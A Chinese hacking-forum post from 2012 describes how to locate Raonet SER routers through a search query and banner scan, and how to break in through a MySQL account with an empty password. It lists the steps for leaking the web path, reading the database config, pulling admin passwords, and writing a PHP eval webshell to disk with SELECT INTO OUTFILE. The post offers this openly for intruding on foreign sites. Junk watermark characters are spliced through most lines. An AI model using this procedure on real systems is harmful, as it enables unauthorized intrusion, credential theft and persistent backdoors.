中国网络渗透测试联盟

标题: 利用某路由器漏洞入侵国外站点 [打印本页]

作者: admin    时间: 2012-12-10 10:30
标题: 利用某路由器漏洞入侵国外站点
  寻找存在漏洞的路由器方法:
3 D& f1 s: s* M/ p3 P! K! v) B, E3 S: N# G0 g
1:google搜索'Raonet Subscriber Ethernet Router'
5 j( f5 c# Z% v0 x, U
5 G2 e$ T- P" L2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
4 _; M# C0 i8 C" ~8 h+ `+ g8 m9 D8 E0 a1 ~1 ^* M
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
$ `8 Y; g6 r) L3 c' N2 G" \3 ~# @
* M) l) c* a6 a% I( n//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
5 {) ?0 e7 P6 ^9 l  z' `1 |- k
0 Q# Y2 B( W" P$ w. M 5 `- |0 c* d9 s, S/ l

9 m  O2 W/ v! R入侵步骤:) B/ r3 {, B) V: ^/ ^7 o0 Y$ ^& B, A

, X' i7 s+ M  s. b1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
0 g4 Z5 f1 r3 K2 J& p" {
* }- O" L( @$ }2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
! [1 W/ ]! ]. ?; w3:得到密码后连接,查看GUI管理密码:0 p: a( G% t: n) Y+ \0 L2 a
use ser_500
8 q/ ?2 v+ B3 Q, K: L" dselect id,passwd from user;
* n+ a1 p, X! l1 ?4:通过数据库写入webshell,执行命令:
5 ?: K5 B3 B: v$ o- \4 G1 m* p. duse mysql;+ ~8 k2 \  p* X& A$ M: `& o" s2 K3 n4 A
create table ok(cmd TEXT);3 A6 X* Y1 p* _
insert into ok values("<?php @eval($_POST[cmd])?>");
7 o5 h: H& T5 Rselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";& Q2 x2 _0 M9 V, @
drop table ok;
" I5 |3 y7 D4 l8 R0 V
: ?1 d/ M0 V0 m2 W( O5 c2 [5:连接后门shell.php 7 E/ F8 m" ^5 c+ T$ u, F: @6 h

+ Y* {( {* z3 g! _6. 搞定!
5 @' a2 i5 x- E* L
, B$ ~0 y! A" j& B) e
作者: Anthony~    时间: 2013-7-27 20:06
这个后果可以很严重的说
作者: jos666    时间: 2013-7-29 12:07
不错哦,黑服务器补洞。。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2